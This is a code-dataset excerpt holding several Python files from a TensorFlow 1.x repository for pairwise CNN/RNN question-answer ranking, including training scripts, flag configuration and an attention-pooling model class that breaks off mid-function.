repo_name
stringclasses 400
values | branch_name
stringclasses 4
values | file_content
stringlengths 16
72.5k
| language
stringclasses 1
value | num_lines
int64 1
1.66k
| avg_line_length
float64 6
85
| max_line_length
int64 9
949
| path
stringlengths 5
103
| alphanum_fraction
float64 0.29
0.89
| alpha_fraction
float64 0.27
0.89
|
|---|---|---|---|---|---|---|---|---|---|
shuishen112/pairwise-rnn
|
refs/heads/master
|
import data_helper
import time
import datetime
import os
import tensorflow as tf
import numpy as np
import evaluation
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
timeDay = time.strftime("%Y%m%d", timeArray)
print (timeStamp)
def main(args):
args._parse_flags()
print("\nParameters:")
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
log_dir = 'log/'+ timeDay
if not os.path.exists(log_dir):
os.makedirs(log_dir)
data_file = log_dir + '/test_' + args.data + timeStamp
precision = data_file + 'precise'
print('load data ...........')
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev])
print('the number of words',len(alphabet))
print('get embedding')
if args.data=="quora":
embedding = data_helper.get_embedding(alphabet,language="cn")
else:
embedding = data_helper.get_embedding(alphabet)
with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model = QA_CNN_extend(max_input_left = q_max_sent_length,
max_input_right = a_max_sent_length,
batch_size = args.batch_size,
vocab_size = len(alphabet),
embedding_size = args.embedding_dim,
filter_sizes = list(map(int, args.filter_sizes.split(","))),
num_filters = args.num_filters,
hidden_size = args.hidden_size,
dropout_keep_prob = args.dropout_keep_prob,
embeddings = embedding,
l2_reg_lambda = args.l2_reg_lambda,
trainable = args.trainable,
pooling = args.pooling,
conv = args.conv)
model.build_graph()
sess.run(tf.global_variables_initializer())
def train_step(model,sess,batch):
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.answer_negative:data[2],
model.q_mask:data[3],
model.a_mask:data[4],
model.a_neg_mask:data[5]
}
_, summary, step, loss, accuracy,score12, score13, see = sess.run(
[model.train_op, model.merged,model.global_step,model.loss, model.accuracy,model.score12,model.score13, model.see],
feed_dict)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
def predict(model,sess,batch,test):
scores = []
for data in batch:
feed_dict = {
model.question:data[0],
model.answer:data[1],
model.q_mask:data[2],
model.a_mask:data[3]
}
score = sess.run(
model.score12,
feed_dict)
scores.extend(score)
return np.array(scores[:len(test)])
for i in range(args.num_epoches):
datas = data_helper.get_mini_batch(train,alphabet,args.batch_size)
train_step(model,sess,datas)
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
print(len(predicted_test))
print(len(test))
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
print('map_mrr test',map_mrr_test)
|
Python
| 116
| 36.043102
| 159
|
/main.py
| 0.553088
| 0.546842
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
class Singleton(object):
__instance=None
def __init__(self):
pass
def getInstance(self):
if Singleton.__instance is None:
# Singleton.__instance=object.__new__(cls,*args,**kwd)
Singleton.__instance=self.get_test_flag()
print("build FLAGS over")
return Singleton.__instance
def get_test_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_rnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
# flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('data','trec','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_cnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "cnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_qcnn_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "qcnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','wiki','data set')
flags.DEFINE_string('pooling','mean','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',True,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
def get_8008_flag(self):
import tensorflow as tf
flags = tf.app.flags
if len(flags.FLAGS.__dict__.keys())<=2:
flags.DEFINE_integer("embedding_size",200, "Dimensionality of character embedding (default: 128)")
flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')")
flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)")
flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)")
flags.DEFINE_float("learning_rate", 1e-3, "learn rate( default: 0.0)")
flags.DEFINE_integer("max_len_left", 40, "max document length of left input")
flags.DEFINE_integer("max_len_right", 40, "max document length of right input")
flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)")
flags.DEFINE_integer("hidden_size",100,"the default hidden size")
flags.DEFINE_string("model_name", "rnn", "cnn or rnn")
# Training parameters
flags.DEFINE_integer("batch_size", 250, "Batch Size (default: 64)")
flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)")
flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)")
flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)")
flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)")
flags.DEFINE_string('data','8008','data set')
flags.DEFINE_string('pooling','max','max pooling or attentive pooling')
flags.DEFINE_boolean('clean',False,'whether we clean the data')
flags.DEFINE_string('conv','wide','wide conv or narrow')
flags.DEFINE_integer('gpu',0,'gpu number')
# Misc Parameters
flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
return flags.FLAGS
if __name__=="__main__":
args=Singleton().get_test_flag()
for attr, value in sorted(args.__flags.items()):
print(("{}={}".format(attr.upper(), value)))
|
Python
| 197
| 60.426395
| 121
|
/config.py
| 0.627396
| 0.597571
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
from tensorflow import flags
import tensorflow as tf
from config import Singleton
import data_helper
import datetime,os
import models
import numpy as np
import evaluation
import sys
import logging
import time
now = int(time.time())
timeArray = time.localtime(now)
timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray)
log_filename = "log/" +time.strftime("%Y%m%d", timeArray)
program = os.path.basename('program')
logger = logging.getLogger(program)
if not os.path.exists(log_filename):
os.makedirs(log_filename)
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa.log',filemode='w')
logging.root.setLevel(level=logging.INFO)
logger.info("running %s" % ' '.join(sys.argv))
from data_helper import log_time_delta,getLogger
logger=getLogger()
args = Singleton().get_qcnn_flag()
args._parse_flags()
opts=dict()
logger.info("\nParameters:")
for attr, value in sorted(args.__flags.items()):
logger.info(("{}={}".format(attr.upper(), value)))
opts[attr]=value
train,test,dev = data_helper.load(args.data,filter = args.clean)
q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split()))
a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split()))
alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data )
logger.info('the number of words :%d '%len(alphabet))
if args.data=="quora" or args.data=="8008" :
print("cn embedding")
embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data )
train_data_loader = data_helper.getBatch48008
else:
embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data )
train_data_loader = data_helper.get_mini_batch
opts["embeddings"] =embedding
opts["vocab_size"]=len(alphabet)
opts["max_input_right"]=a_max_sent_length
opts["max_input_left"]=q_max_sent_length
opts["filter_sizes"]=list(map(int, args.filter_sizes.split(",")))
print("innitilize over")
#with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)):
with tf.Graph().as_default():
# with tf.device("/cpu:0"):
session_conf = tf.ConfigProto()
session_conf.allow_soft_placement = args.allow_soft_placement
session_conf.log_device_placement = args.log_device_placement
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
model=models.setup(opts)
model.build_graph()
saver = tf.train.Saver()
# ckpt = tf.train.get_checkpoint_state("checkpoint")
# if ckpt and ckpt.model_checkpoint_path:
# # Restores from checkpoint
# saver.restore(sess, ckpt.model_checkpoint_path)
# if os.path.exists("model") :
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
# variable_averages = tf.train.ExponentialMovingAverage( model)
# variables_to_restore = variable_averages.variables_to_restore()
# saver = tf.train.Saver(variables_to_restore)
# for name in variables_to_restore:
# print(name)
sess.run(tf.global_variables_initializer())
@log_time_delta
def predict(model,sess,batch,test):
scores = []
for data in batch:
score = model.predict(sess,data)
scores.extend(score)
return np.array(scores[:len(test)])
best_p1=0
for i in range(args.num_epoches):
for data in train_data_loader(train,alphabet,args.batch_size,model=model,sess=sess):
# for data in data_helper.getBatch48008(train,alphabet,args.batch_size):
_, summary, step, loss, accuracy,score12, score13, see = model.train(sess,data)
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
logger.info("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13)))
#<<<<<<< HEAD
#
#
# if i>0 and i % 5 ==0:
# test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
#
# predicted_test = predict(model,sess,test_datas,test)
# map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
#
# logger.info('map_mrr test' +str(map_mrr_test))
# print('map_mrr test' +str(map_mrr_test))
#
# test_datas = data_helper.get_mini_batch_test(dev,alphabet,args.batch_size)
# predicted_test = predict(model,sess,test_datas,dev)
# map_mrr_test = evaluation.evaluationBypandas(dev,predicted_test)
#
# logger.info('map_mrr dev' +str(map_mrr_test))
# print('map_mrr dev' +str(map_mrr_test))
# map,mrr,p1 = map_mrr_test
# if p1>best_p1:
# best_p1=p1
# filename= "checkpoint/"+args.data+"_"+str(p1)+".model"
# save_path = saver.save(sess, filename)
# # load_path = saver.restore(sess, model_path)
#
# import shutil
# shutil.rmtree("model")
# builder = tf.saved_model.builder.SavedModelBuilder("./model")
# builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING])
# builder.save(True)
#
#
#=======
test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size)
predicted_test = predict(model,sess,test_datas,test)
map_mrr_test = evaluation.evaluationBypandas(test,predicted_test)
logger.info('map_mrr test' +str(map_mrr_test))
print('epoch '+ str(i) + 'map_mrr test' +str(map_mrr_test))
|
Python
| 164
| 35.829269
| 161
|
/run.py
| 0.628704
| 0.62142
|
shuishen112/pairwise-rnn
|
refs/heads/master
|
#coding:utf-8
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn
import models.blocks as blocks
# model_type :apn or qacnn
class QA_CNN_extend(object):
# def __init__(self,max_input_left,max_input_right,batch_size,vocab_size,embedding_size,filter_sizes,num_filters,hidden_size,
# dropout_keep_prob = 1,learning_rate = 0.001,embeddings = None,l2_reg_lambda = 0.0,trainable = True,pooling = 'attentive',conv = 'narrow'):
#
# """
# QA_RNN model for question answering
#
# Args:
# self.dropout_keep_prob: dropout rate
# self.num_filters : number of filters
# self.para : parameter list
# self.extend_feature_dim : my extend feature dimension
# self.max_input_left : the length of question
# self.max_input_right : the length of answer
# self.pooling : pooling strategy :max pooling or attentive pooling
#
# """
# self.dropout_keep_prob = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
# self.num_filters = num_filters
# self.embeddings = embeddings
# self.embedding_size = embedding_size
# self.batch_size = batch_size
# self.filter_sizes = filter_sizes
# self.l2_reg_lambda = l2_reg_lambda
# self.para = []
#
# self.max_input_left = max_input_left
# self.max_input_right = max_input_right
# self.trainable = trainable
# self.vocab_size = vocab_size
# self.pooling = pooling
# self.total_num_filter = len(self.filter_sizes) * self.num_filters
#
# self.conv = conv
# self.pooling = 'traditional'
# self.learning_rate = learning_rate
#
# self.hidden_size = hidden_size
#
# self.attention_size = 100
def __init__(self,opt):
for key,value in opt.items():
self.__setattr__(key,value)
self.attention_size = 100
self.pooling = 'mean'
self.total_num_filter = len(self.filter_sizes) * self.num_filters
self.para = []
self.dropout_keep_prob_holder = tf.placeholder(tf.float32,name = 'dropout_keep_prob')
def create_placeholder(self):
print(('Create placeholders'))
# he length of the sentence is varied according to the batch,so the None,None
self.question = tf.placeholder(tf.int32,[None,None],name = 'input_question')
self.max_input_left = tf.shape(self.question)[1]
self.batch_size = tf.shape(self.question)[0]
self.answer = tf.placeholder(tf.int32,[None,None],name = 'input_answer')
self.max_input_right = tf.shape(self.answer)[1]
self.answer_negative = tf.placeholder(tf.int32,[None,None],name = 'input_right')
# self.q_mask = tf.placeholder(tf.int32,[None,None],name = 'q_mask')
# self.a_mask = tf.placeholder(tf.int32,[None,None],name = 'a_mask')
# self.a_neg_mask = tf.placeholder(tf.int32,[None,None],name = 'a_neg_mask')
def add_embeddings(self):
print( 'add embeddings')
if self.embeddings is not None:
print( "load embedding")
W = tf.Variable(np.array(self.embeddings),name = "W" ,dtype="float32",trainable = self.trainable)
else:
print( "random embedding")
W = tf.Variable(tf.random_uniform([self.vocab_size, self.embedding_size], -1.0, 1.0),name="W",trainable = self.trainable)
self.embedding_W = W
# self.overlap_W = tf.Variable(a,name="W",trainable = True)
self.para.append(self.embedding_W)
self.q_embedding = tf.nn.embedding_lookup(self.embedding_W,self.question)
self.a_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer)
self.a_neg_embedding = tf.nn.embedding_lookup(self.embedding_W,self.answer_negative)
#real length
self.q_len,self.q_mask = blocks.length(self.question)
self.a_len,self.a_mask = blocks.length(self.answer)
self.a_neg_len,self.a_neg_mask = blocks.length(self.answer_negative)
def convolution(self):
print( 'convolution:wide_convolution')
self.kernels = []
for i,filter_size in enumerate(self.filter_sizes):
with tf.name_scope('conv-max-pool-%s' % filter_size):
filter_shape = [filter_size,self.embedding_size,1,self.num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev = 0.1), name="W")
b = tf.Variable(tf.constant(0.0, shape=[self.num_filters]), name="b")
self.kernels.append((W,b))
self.para.append(W)
self.para.append(b)
embeddings = [self.q_embedding,self.a_embedding,self.a_neg_embedding]
self.q_cnn,self.a_cnn,self.a_neg_cnn = [self.wide_convolution(tf.expand_dims(embedding,-1)) for embedding in embeddings]
#convolution
def pooling_graph(self):
if self.pooling == 'mean':
self.q_pos_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.q_neg_cnn = self.mean_pooling(self.q_cnn,self.q_mask)
self.a_pos_cnn = self.mean_pooling(self.a_cnn,self.a_mask)
self.a_neg_cnn = self.mean_pooling(self.a_neg_cnn,self.a_neg_mask)
elif self.pooling == 'attentive':
self.q_pos_cnn,self.a_pos_cnn = self.attentive_pooling(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.attentive_pooling(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'position':
self.q_pos_cnn,self.a_pos_cnn = self.position_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.position_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
elif self.pooling == 'traditional':
print( self.pooling)
print(self.q_cnn)
self.q_pos_cnn,self.a_pos_cnn = self.traditional_attention(self.q_cnn,self.a_cnn,self.q_mask,self.a_mask)
self.q_neg_cnn,self.a_neg_cnn = self.traditional_attention(self.q_cnn,self.a_neg_cnn,self.q_mask,self.a_neg_mask)
def para_initial(self):
# print(("---------"))
# self.W_qp = tf.Variable(tf.truncated_normal(shape = [self.hidden_size * 2,1],stddev = 0.01,name = 'W_qp'))
self.U = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'U'))
self.W_hm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_hm'))
self.W_qm = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.total_num_filter],stddev = 0.01,name = 'W_qm'))
self.W_ms = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,1],stddev = 0.01,name = 'W_ms'))
self.M_qi = tf.Variable(tf.truncated_normal(shape = [self.total_num_filter,self.embedding_size],stddev = 0.01,name = 'M_qi'))
def mean_pooling(self,conv,mask):
conv = tf.squeeze(conv,2)
print( tf.expand_dims(tf.cast(mask,tf.float32),-1))
# conv_mask = tf.multiply(conv,tf.expand_dims(tf.cast(mask,tf.float32),-1))
# self.see = conv_mask
# print( conv_mask)
return tf.reduce_mean(conv,axis = 1);
def attentive_pooling(self,input_left,input_right,q_mask,a_mask):
Q = tf.squeeze(input_left,axis = 2)
A = tf.squeeze(input_right,axis = 2)
print( Q)
print( A)
# Q = tf.reshape(input_left,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,len(self.filter_sizes) * self.num_filters],name = 'A')
# G = tf.tanh(tf.matmul(tf.matmul(Q,self.U),\
# A,transpose_b = True),name = 'G')
first = tf.matmul(tf.reshape(Q,[-1,len(self.filter_sizes) * self.num_filters]),self.U)
second_step = tf.reshape(first,[-1,self.max_input_left,len(self.filter_sizes) * self.num_filters])
result = tf.matmul(second_step,tf.transpose(A,perm = [0,2,1]))
print( second_step)
print( tf.transpose(A,perm = [0,2,1]))
# print( 'result',result)
G = tf.tanh(result)
# G = result
# column-wise pooling ,row-wise pooling
row_pooling = tf.reduce_max(G,1,True,name = 'row_pooling')
col_pooling = tf.reduce_max(G,2,True,name = 'col_pooling')
self.attention_q = tf.nn.softmax(col_pooling,1,name = 'attention_q')
self.attention_q_mask = tf.multiply(self.attention_q,tf.expand_dims(tf.cast(q_mask,tf.float32),-1))
self.attention_a = tf.nn.softmax(row_pooling,name = 'attention_a')
self.attention_a_mask = tf.multiply(self.attention_a,tf.expand_dims(tf.cast(a_mask,tf.float32),1))
self.see = G
R_q = tf.reshape(tf.matmul(Q,self.attention_q_mask,transpose_a = 1),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_q')
R_a = tf.reshape(tf.matmul(self.attention_a_mask,A),[-1,self.num_filters * len(self.filter_sizes)],name = 'R_a')
return R_q,R_a
def traditional_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
input_left_mask = tf.multiply(input_left, tf.expand_dims(tf.cast(q_mask,tf.float32),2))
Q = tf.reduce_mean(input_left_mask,1)
a_shape = tf.shape(input_right)
A = tf.reshape(input_right,[-1,self.total_num_filter])
m_t = tf.nn.tanh(tf.reshape(tf.matmul(A,self.W_hm),[-1,a_shape[1],self.total_num_filter]) + tf.expand_dims(tf.matmul(Q,self.W_qm),1))
f_attention = tf.exp(tf.reshape(tf.matmul(tf.reshape(m_t,[-1,self.total_num_filter]),self.W_ms),[-1,a_shape[1],1]))
self.f_attention_mask = tf.multiply(f_attention,tf.expand_dims(tf.cast(a_mask,tf.float32),2))
self.f_attention_norm = tf.divide(self.f_attention_mask,tf.reduce_sum(self.f_attention_mask,1,keep_dims = True))
self.see = self.f_attention_norm
a_attention = tf.reduce_sum(tf.multiply(input_right,self.f_attention_norm),1)
return Q,a_attention
def position_attention(self,input_left,input_right,q_mask,a_mask):
input_left = tf.squeeze(input_left,axis = 2)
input_right = tf.squeeze(input_right,axis = 2)
# Q = tf.reshape(input_left,[-1,self.max_input_left,self.hidden_size*2],name = 'Q')
# A = tf.reshape(input_right,[-1,self.max_input_right,self.hidden_size*2],name = 'A')
Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
QU = tf.matmul(Q,self.U)
QUA = tf.multiply(tf.expand_dims(QU,1),input_right)
self.attention_a = tf.cast(tf.argmax(QUA,2)
,tf.float32)
# q_shape = tf.shape(input_left)
# Q_1 = tf.reshape(input_left,[-1,self.total_num_filter])
# QU = tf.matmul(Q_1,self.U)
# QU_1 = tf.reshape(QU,[-1,q_shape[1],self.total_num_filter])
# A_1 = tf.transpose(input_right,[0,2,1])
# QUA = tf.matmul(QU_1,A_1)
# QUA = tf.nn.l2_normalize(QUA,1)
# G = tf.tanh(QUA)
# Q = tf.reduce_mean(tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2)),1)
# # self.Q_mask = tf.multiply(input_left,tf.expand_dims(tf.cast(self.q_mask,tf.float32),2))
# row_pooling = tf.reduce_max(G,1,name="row_pooling")
# col_pooling = tf.reduce_max(G,2,name="col_pooling")
# self.attention_a = tf.nn.softmax(row_pooling,1,name = "attention_a")
self.attention_a_mask = tf.multiply(self.attention_a,tf.cast(a_mask,tf.float32))
self.see = self.attention_a
self.attention_a_norm = tf.divide(self.attention_a_mask,tf.reduce_sum(self.attention_a_mask,1,keep_dims =True))
self.r_a = tf.reshape(tf.matmul(tf.transpose(input_right,[0,2,1]) ,tf.expand_dims(self.attention_a_norm,2)),[-1,self.total_num_filter])
return Q ,self.r_a
def create_loss(self):
with tf.name_scope('score'):
self.score12 = self.getCosine(self.q_pos_cnn,self.a_pos_cnn)
self.score13 = self.getCosine(self.q_neg_cnn,self.a_neg_cnn)
l2_loss = tf.constant(0.0)
for p in self.para:
l2_loss += tf.nn.l2_loss(p)
with tf.name_scope("loss"):
self.losses = tf.maximum(0.0, tf.subtract(0.05, tf.subtract(self.score12, self.score13)))
self.loss = tf.reduce_sum(self.losses) + self.l2_reg_lambda * l2_loss
tf.summary.scalar('loss', self.loss)
# Accuracy
with tf.name_scope("accuracy"):
self.correct = tf.equal(0.0, self.losses)
self.accuracy = tf.reduce_mean(tf.cast(self.correct, "float"), name="accuracy")
tf.summary.scalar('accuracy', self.accuracy)
def create_op(self):
self.global_step = tf.Variable(0, name = "global_step", trainable = False)
self.optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.grads_and_vars = self.optimizer.compute_gradients(self.loss)
self.train_op = self.optimizer.apply_gradients(self.grads_and_vars, global_step = self.global_step)
def max_pooling(self,conv,input_length):
pooled = tf.nn.max_pool(
conv,
ksize = [1, input_length, 1, 1],
strides = [1, 1, 1, 1],
padding = 'VALID',
name="pool")
return pooled
def getCosine(self,q,a):
pooled_flat_1 = tf.nn.dropout(q, self.dropout_keep_prob_holder)
pooled_flat_2 = tf.nn.dropout(a, self.dropout_keep_prob_holder)
pooled_len_1 = tf.sqrt(tf.reduce_sum(tf.multiply(pooled_flat_1, pooled_flat_1), 1))
